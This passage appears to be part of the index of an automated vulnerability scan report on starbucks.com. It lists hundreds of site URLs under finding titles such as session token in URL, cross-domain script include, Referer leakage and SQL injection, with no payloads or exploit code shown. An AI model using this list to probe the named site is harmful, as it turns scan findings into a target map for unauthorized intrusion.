2.263. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream [name of an arbitrarily supplied request parameter]

2.264. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream [name of an arbitrarily supplied request parameter]

2.265. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.266. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.267. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream [name of an arbitrarily supplied request parameter]

2.268. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream [name of an arbitrarily supplied request parameter]

2.269. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.270. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

2.271. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]

2.272. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

2.273. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]

2.274. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

2.275. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]

2.276. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]

2.277. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]

2.278. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]

2.279. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]

2.280. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]

2.281. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]

2.282. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]

2.283. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]

2.284. http://www.starbucks.com/menu/nutrition [name of an arbitrarily supplied request parameter]

2.285. http://www.starbucks.com/menu/nutrition/20-under-200 [name of an arbitrarily supplied request parameter]

2.286. http://www.starbucks.com/menu/nutrition/35-under-350 [name of an arbitrarily supplied request parameter]

2.287. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

2.288. http://www.starbucks.com/responsibility [name of an arbitrarily supplied request parameter]

2.289. http://www.starbucks.com/responsibility/community [name of an arbitrarily supplied request parameter]

2.290. http://www.starbucks.com/responsibility/community/community-service [name of an arbitrarily supplied request parameter]

2.291. http://www.starbucks.com/responsibility/community/ethos-water-fund [name of an arbitrarily supplied request parameter]

2.292. http://www.starbucks.com/responsibility/community/starbucks-foundation [name of an arbitrarily supplied request parameter]

2.293. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

2.294. http://www.starbucks.com/responsibility/community/starbucks-red [name of an arbitrarily supplied request parameter]

2.295. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

2.296. http://www.starbucks.com/responsibility/community/youth-action [name of an arbitrarily supplied request parameter]

2.297. http://www.starbucks.com/responsibility/diversity [name of an arbitrarily supplied request parameter]

2.298. http://www.starbucks.com/responsibility/diversity/suppliers [name of an arbitrarily supplied request parameter]

2.299. http://www.starbucks.com/responsibility/environment [name of an arbitrarily supplied request parameter]

2.300. http://www.starbucks.com/responsibility/environment/climate-change [name of an arbitrarily supplied request parameter]

2.301. http://www.starbucks.com/responsibility/environment/energy [name of an arbitrarily supplied request parameter]

2.302. http://www.starbucks.com/responsibility/environment/explore-green-store [name of an arbitrarily supplied request parameter]

2.303. http://www.starbucks.com/responsibility/environment/green-building [name of an arbitrarily supplied request parameter]

2.304. http://www.starbucks.com/responsibility/environment/recycling [name of an arbitrarily supplied request parameter]

2.305. http://www.starbucks.com/responsibility/environment/water [name of an arbitrarily supplied request parameter]

2.306. http://www.starbucks.com/responsibility/learn-more/goals-and-progress [name of an arbitrarily supplied request parameter]

2.307. http://www.starbucks.com/responsibility/learn-more/policies [name of an arbitrarily supplied request parameter]

2.308. http://www.starbucks.com/responsibility/learn-more/relationships [name of an arbitrarily supplied request parameter]

2.309. http://www.starbucks.com/responsibility/learn-more/shared-values-blog [name of an arbitrarily supplied request parameter]

2.310. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet [name of an arbitrarily supplied request parameter]

2.311. http://www.starbucks.com/responsibility/sourcing [name of an arbitrarily supplied request parameter]

2.312. http://www.starbucks.com/responsibility/sourcing/cocoa [name of an arbitrarily supplied request parameter]

2.313. http://www.starbucks.com/responsibility/sourcing/coffee [name of an arbitrarily supplied request parameter]

2.314. http://www.starbucks.com/responsibility/sourcing/farmer-support [name of an arbitrarily supplied request parameter]

2.315. http://www.starbucks.com/responsibility/sourcing/store-products [name of an arbitrarily supplied request parameter]

2.316. http://www.starbucks.com/responsibility/sourcing/tea [name of an arbitrarily supplied request parameter]

2.317. http://www.starbucks.com/responsibility/wellness [name of an arbitrarily supplied request parameter]

2.318. http://www.starbucks.com/search [keywords parameter]

2.319. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

2.320. http://www.starbucks.com/search/ [keywords parameter]

2.321. http://www.starbucks.com/search/ [name of an arbitrarily supplied request parameter]

2.322. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

2.323. http://www.starbucks.com/smooth [name of an arbitrarily supplied request parameter]

2.324. http://www.starbucks.com/smooth/ [name of an arbitrarily supplied request parameter]

2.325. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

2.326. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

2.327. https://www.starbucks.com/card/set-auto-reload [name of an arbitrarily supplied request parameter]

3. Session token in URL

3.1. http://www.starbucks.com/about-us

3.2. http://www.starbucks.com/about-us/company-information

3.3. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement

3.4. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

3.5. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility

3.6. http://www.starbucks.com/about-us/company-information/product-advisories

3.7. http://www.starbucks.com/about-us/our-heritage

3.8. http://www.starbucks.com/site-map

4. Flash cross-domain policy

5. Cross-domain Referer leakage

5.1. http://www.starbucks.com/menu/catalog/nutrition

5.2. http://www.starbucks.com/menu/catalog/nutrition

5.3. http://www.starbucks.com/menu/catalog/nutrition

5.4. http://www.starbucks.com/search

5.5. http://www.starbucks.com/search

6. Cross-domain script include

6.1. http://www.starbucks.com/

6.2. http://www.starbucks.com/about-us

6.3. http://www.starbucks.com/about-us/company-information

6.4. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement

6.5. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

6.6. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility

6.7. http://www.starbucks.com/about-us/company-information/product-advisories

6.8. http://www.starbucks.com/about-us/our-heritage

6.9. http://www.starbucks.com/business

6.10. http://www.starbucks.com/business/foodservice

6.11. http://www.starbucks.com/business/international-stores

6.12. http://www.starbucks.com/business/licensed-stores

6.13. http://www.starbucks.com/business/office-coffee

6.14. http://www.starbucks.com/career-center

6.15. http://www.starbucks.com/career-center/career-diversity

6.16. http://www.starbucks.com/career-center/career-diversity/partner-networks

6.17. http://www.starbucks.com/career-center/international-positions

6.18. http://www.starbucks.com/career-center/working-at-starbucks

6.19. http://www.starbucks.com/coffee

6.20. http://www.starbucks.com/coffee/learn

6.21. http://www.starbucks.com/coffee/learn/clover

6.22. http://www.starbucks.com/coffee/learn/flavors-in-your-cup

6.23. http://www.starbucks.com/coffee/starbucks-natural-fusions

6.24. http://www.starbucks.com/coffee/starbucks-natural-fusions/caramel

6.25. http://www.starbucks.com/coffee/starbucks-natural-fusions/cinnamon

6.26. http://www.starbucks.com/coffee/starbucks-natural-fusions/savoring

6.27. http://www.starbucks.com/coffee/starbucks-natural-fusions/vanilla

6.28. http://www.starbucks.com/coffee/starbucks-reserve-coffee

6.29. http://www.starbucks.com/coffee/starbucks-reserve-coffee/el-salvador-montecarlos-estate-pacamara

6.30. http://www.starbucks.com/coffee/starbucks-reserve-coffee/fair-trade-colombia-asoapia

6.31. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-blue-java

6.32. http://www.starbucks.com/coffee/starbucks-reserve-coffee/organic-peru-tingo-maria

6.33. http://www.starbucks.com/coffee/via

6.34. http://www.starbucks.com/coffee/via/flavored-coffee

6.35. http://www.starbucks.com/coffee/via/instant-coffee

6.36. http://www.starbucks.com/coffee/whole-bean-coffee

6.37. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia

6.38. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific

6.39. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast

6.40. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

6.41. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

6.42. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america

6.43. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends

6.44. http://www.starbucks.com/coffeehouse

6.45. http://www.starbucks.com/coffeehouse/community

6.46. http://www.starbucks.com/coffeehouse/community/mystarbucksidea

6.47. http://www.starbucks.com/coffeehouse/entertainment

6.48. http://www.starbucks.com/coffeehouse/mobile-apps

6.49. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks

6.50. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile

6.51. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb

6.52. http://www.starbucks.com/coffeehouse/store-design

6.53. http://www.starbucks.com/coffeehouse/wireless-internet

6.54. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada

6.55. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network

6.56. http://www.starbucks.com/customer-service

6.57. http://www.starbucks.com/customer-service/contact

6.58. http://www.starbucks.com/customer-service/faqs/card

6.59. http://www.starbucks.com/customer-service/faqs/coffee

6.60. http://www.starbucks.com/customer-service/faqs/coffeehouse

6.61. http://www.starbucks.com/customer-service/faqs/menu

6.62. http://www.starbucks.com/customer-service/faqs/responsibility

6.63. http://www.starbucks.com/customer-service/faqs/shop

6.64. http://www.starbucks.com/menu

6.65. http://www.starbucks.com/menu/catalog/nutrition

6.66. http://www.starbucks.com/menu/drinks

6.67. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-dark-chocolate-mocha

6.68. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-mocha

6.69. http://www.starbucks.com/menu/drinks/bottled-drinks/bottled-frappuccino-vanilla

6.70. http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy

6.71. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

6.72. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino

6.73. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

6.74. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

6.75. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

6.76. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

6.77. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day

6.78. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto

6.79. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee

6.80. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler

6.81. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast

6.82. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee

6.83. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast

6.84. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate

6.85. http://www.starbucks.com/menu/drinks/chocolate/peppermint-mocha-hot-chocolate

6.86. http://www.starbucks.com/menu/drinks/chocolate/salted-caramel-hot-chocolate

6.87. http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate

6.88. http://www.starbucks.com/menu/drinks/espresso/caffe-americano

6.89. http://www.starbucks.com/menu/drinks/espresso/caffe-latte

6.90. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha

6.91. http://www.starbucks.com/menu/drinks/espresso/cappuccino

6.92. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte

6.93. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato

6.94. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte

6.95. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte

6.96. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna

6.97. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato

6.98. http://www.starbucks.com/menu/drinks/espresso/espresso-shot

6.99. http://www.starbucks.com/menu/drinks/espresso/flavored-latte

6.100. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte

6.101. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano

6.102. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-latte

6.103. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-mocha

6.104. http://www.starbucks.com/menu/drinks/espresso/iced-caramel-macchiato

6.105. http://www.starbucks.com/menu/drinks/espresso/iced-cinnamon-dolce-latte

6.106. http://www.starbucks.com/menu/drinks/espresso/iced-flavored-latte

6.107. http://www.starbucks.com/menu/drinks/espresso/iced-gingerbread-latte

6.108. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-mocha

6.109. http://www.starbucks.com/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha

6.110. http://www.starbucks.com/menu/drinks/espresso/iced-pumpkin-spice-latte

6.111. http://www.starbucks.com/menu/drinks/espresso/iced-skinny-flavored-latte

6.112. http://www.starbucks.com/menu/drinks/espresso/iced-toffee-mocha

6.113. http://www.starbucks.com/menu/drinks/espresso/iced-white-chocolate-mocha

6.114. http://www.starbucks.com/menu/drinks/espresso/peppermint-mocha

6.115. http://www.starbucks.com/menu/drinks/espresso/peppermint-white-chocolate-mocha

6.116. http://www.starbucks.com/menu/drinks/espresso/pumpkin-spice-latte

6.117. http://www.starbucks.com/menu/drinks/espresso/skinny-caramel-macchiato

6.118. http://www.starbucks.com/menu/drinks/espresso/skinny-cinnamon-dolce-latte

6.119. http://www.starbucks.com/menu/drinks/espresso/skinny-flavored-latte

6.120. http://www.starbucks.com/menu/drinks/espresso/toffee-mocha

6.121. http://www.starbucks.com/menu/drinks/espresso/white-chocolate-mocha

6.122. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages

6.123. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-blended-coffee

6.124. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caffe-vanilla-frappuccino-light-blended-coffee

6.125. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-brulee-frappuccino-blended-beverage

6.126. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-blended-coffee

6.127. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/caramel-frappuccino-light-blended-coffee

6.128. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/chai-creme-frappuccino-blended-creme

6.129. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-coffee

6.130. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-blended-creme

6.131. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/cinnamon-dolce-frappuccino-light-blended-coffee

6.132. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-blended-coffee

6.133. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/coffee-frappuccino-light-blended-coffee

6.134. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/double-chocolaty-chip-frappuccino-blended-creme

6.135. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/espresso-frappuccino-blended-coffee

6.136. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/extra-coffee-caramel-frappuccino-blended-beverage

6.137. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/green-tea-frappuccino-blended-creme

6.138. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-blended-coffee

6.139. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/java-chip-frappuccino-light-blended-coffee

6.140. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-blended-coffee

6.141. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/mocha-frappuccino-light-blended-coffee

6.142. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-blended-beverage

6.143. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/peppermint-mocha-frappuccino-light-blended-beverage

6.144. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-creme-frappuccino-blended-beverage

6.145. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-blended-beverage

6.146. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/pumpkin-spice-frappuccino-light-blended-beverage

6.147. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/soy-strawberries-and-creme-frappuccino-blended-beverage

6.148. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/strawberries-and-creme-frappuccino-blended-creme

6.149. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-blended-beverage

6.150. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/toffee-mocha-frappuccino-light-blended-beverage

6.151. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/vanilla-bean-frappuccino-blended-creme

6.152. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-frappuccino-blended-creme

6.153. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages/white-chocolate-mocha-frappuccino-blended-coffee

6.154. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/caramel-apple-spice

6.155. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/cold-apple-juice

6.156. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/flavored-steamed-milk

6.157. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/milk

6.158. http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice

6.159. http://www.starbucks.com/menu/drinks/tazo-tea/awake

6.160. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte

6.161. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea

6.162. http://www.starbucks.com/menu/drinks/tazo-tea/calm

6.163. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte

6.164. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips

6.165. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey

6.166. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte

6.167. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte

6.168. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte

6.169. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte

6.170. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte

6.171. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom

6.172. http://www.starbucks.com/menu/drinks/tazo-tea/passion

6.173. http://www.starbucks.com/menu/drinks/tazo-tea/refresh

6.174. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

6.175. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea

6.176. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

6.177. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea

6.178. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

6.179. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

6.180. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte

6.181. http://www.starbucks.com/menu/drinks/tazo-tea/zen

6.182. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

6.183. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

6.184. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

6.185. http://www.starbucks.com/menu/food

6.186. http://www.starbucks.com/menu/food/bakery/8-grain-roll

6.187. http://www.starbucks.com/menu/food/bakery/apple-bran-muffin

6.188. http://www.starbucks.com/menu/food/bakery/apple-fritter

6.189. http://www.starbucks.com/menu/food/bakery/asiago-bagel

6.190. http://www.starbucks.com/menu/food/bakery/banana-nut-loaf

6.191. http://www.starbucks.com/menu/food/bakery/birthday-cake-mini-doughnut

6.192. http://www.starbucks.com/menu/food/bakery/blueberry-oat-bar

6.193. http://www.starbucks.com/menu/food/bakery/blueberry-scone

6.194. http://www.starbucks.com/menu/food/bakery/blueberry-streusel-muffin

6.195. http://www.starbucks.com/menu/food/bakery/butter-croissant

6.196. http://www.starbucks.com/menu/food/bakery/cheese-danish

6.197. http://www.starbucks.com/menu/food/bakery/chocolate-chunk-cookie

6.198. http://www.starbucks.com/menu/food/bakery/chocolate-croissant

6.199. http://www.starbucks.com/menu/food/bakery/chocolate-old-fashion-doughnut

6.200. http://www.starbucks.com/menu/food/bakery/chonga-bagel

6.201. http://www.starbucks.com/menu/food/bakery/cinnamon-chip-scone

6.202. http://www.starbucks.com/menu/food/bakery/cranberry-orange-scone

6.203. http://www.starbucks.com/menu/food/bakery/double-chocolate-brownie

6.204. http://www.starbucks.com/menu/food/bakery/double-fudge-mini-doughnut

6.205. http://www.starbucks.com/menu/food/bakery/double-iced-cinnamon-roll

6.206. http://www.starbucks.com/menu/food/bakery/ginger-molasses-cookie

6.207. http://www.starbucks.com/menu/food/bakery/hawaiian-bagel

6.208. http://www.starbucks.com/menu/food/bakery/iced-lemon-pound-cake

6.209. http://www.starbucks.com/menu/food/bakery/low-fat-raspberry-sunshine-muffin

6.210. http://www.starbucks.com/menu/food/bakery/mallorca-sweet-bread

6.211. http://www.starbucks.com/menu/food/bakery/maple-oat-pecan-scone

6.212. http://www.starbucks.com/menu/food/bakery/marble-pound-cake

6.213. http://www.starbucks.com/menu/food/bakery/marshmallow-dream-bar

6.214. http://www.starbucks.com/menu/food/bakery/morning-bun

6.215. http://www.starbucks.com/menu/food/bakery/multigrain-bagel

6.216. http://www.starbucks.com/menu/food/bakery/old-fashion-glazed-doughnut

6.217. http://www.starbucks.com/menu/food/bakery/outrageous-oatmeal-cookie

6.218. http://www.starbucks.com/menu/food/bakery/petite-vanilla-bean-scone

6.219. http://www.starbucks.com/menu/food/bakery/plain-bagel

6.220. http://www.starbucks.com/menu/food/bakery/pumpkin-bread

6.221. http://www.starbucks.com/menu/food/bakery/raspberry-scone

6.222. http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake

6.223. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

6.224. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

6.225. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake

6.226. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake

6.227. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie

6.228. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie

6.229. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake

6.230. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin

6.231. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

6.232. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

6.233. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate

6.234. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

6.235. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

6.236. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar

6.237. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit

6.238. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts

6.239. http://www.starbucks.com/menu/food/hot-breakfast/reduced-fat-turkey-bacon-with-egg-whites-on-an-english-muffin

6.240. http://www.starbucks.com/menu/food/hot-breakfast/sausage-egg-and-cheese-on-an-english-muffin

6.241. http://www.starbucks.com/menu/food/hot-breakfast/starbucks-perfect-oatmeal

6.242. http://www.starbucks.com/menu/food/hot-breakfast/veggie-egg-and-monterey-jack-artisan-breakfast-sandwich

6.243. http://www.starbucks.com/menu/food/ice-cream/caramel-macchiato-ice-cream

6.244. http://www.starbucks.com/menu/food/ice-cream/coffee-ice-cream

6.245. http://www.starbucks.com/menu/food/ice-cream/java-chip-frappuccino-ice-cream

6.246. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream

6.247. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream

6.248. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream

6.249. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

6.250. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

6.251. http://www.starbucks.com/menu/food/salads/farmers-market-salad

6.252. http://www.starbucks.com/menu/food/salads/fruit-cup

6.253. http://www.starbucks.com/menu/food/salads/garden-pesto-salad

6.254. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad

6.255. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

6.256. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

6.257. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

6.258. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

6.259. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

6.260. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

6.261. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait

6.262. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait

6.263. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

6.264. http://www.starbucks.com/menu/nutrition

6.265. http://www.starbucks.com/menu/nutrition/20-under-200

6.266. http://www.starbucks.com/menu/nutrition/35-under-350

6.267. http://www.starbucks.com/responsibility

6.268. http://www.starbucks.com/responsibility/community

6.269. http://www.starbucks.com/responsibility/community/community-service

6.270. http://www.starbucks.com/responsibility/community/ethos-water-fund

6.271. http://www.starbucks.com/responsibility/community/starbucks-foundation

6.272. http://www.starbucks.com/responsibility/community/starbucks-red

6.273. http://www.starbucks.com/responsibility/community/youth-action

6.274. http://www.starbucks.com/responsibility/diversity

6.275. http://www.starbucks.com/responsibility/diversity/suppliers

6.276. http://www.starbucks.com/responsibility/environment

6.277. http://www.starbucks.com/responsibility/environment/climate-change

6.278. http://www.starbucks.com/responsibility/environment/energy

6.279. http://www.starbucks.com/responsibility/environment/explore-green-store

6.280. http://www.starbucks.com/responsibility/environment/green-building

6.281. http://www.starbucks.com/responsibility/environment/recycling

6.282. http://www.starbucks.com/responsibility/environment/water

6.283. http://www.starbucks.com/responsibility/learn-more/goals-and-progress

6.284. http://www.starbucks.com/responsibility/learn-more/policies

6.285. http://www.starbucks.com/responsibility/learn-more/relationships

6.286. http://www.starbucks.com/responsibility/learn-more/shared-values-blog

6.287. http://www.starbucks.com/responsibility/learn-more/starbucks-shared-planet

6.288. http://www.starbucks.com/responsibility/sourcing

6.289. http://www.starbucks.com/responsibility/sourcing/cocoa

6.290. http://www.starbucks.com/responsibility/sourcing/coffee

6.291. http://www.starbucks.com/responsibility/sourcing/farmer-support

6.292. http://www.starbucks.com/responsibility/sourcing/store-products

6.293. http://www.starbucks.com/responsibility/sourcing/tea

6.294. http://www.starbucks.com/responsibility/wellness

6.295. http://www.starbucks.com/search

6.296. http://www.starbucks.com/site-map

6.297. http://www.starbucks.com/smooth

6.298. http://www.starbucks.com/store-locator

6.299. http://www.starbucks.com/whats-new

6.300. https://www.starbucks.com/card/set-auto-reload

7. Email addresses disclosed

7.1. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use

7.2. http://www.starbucks.com/customer-service/faqs/card

7.3. http://www.starbucks.com/customer-service/faqs/coffeehouse

7.4. http://www.starbucks.com/customer-service/faqs/shop

7.5. http://www.starbucks.com/static/js/global.js

8. Robots.txt file

9. SSL certificate



1. SQL injection  next
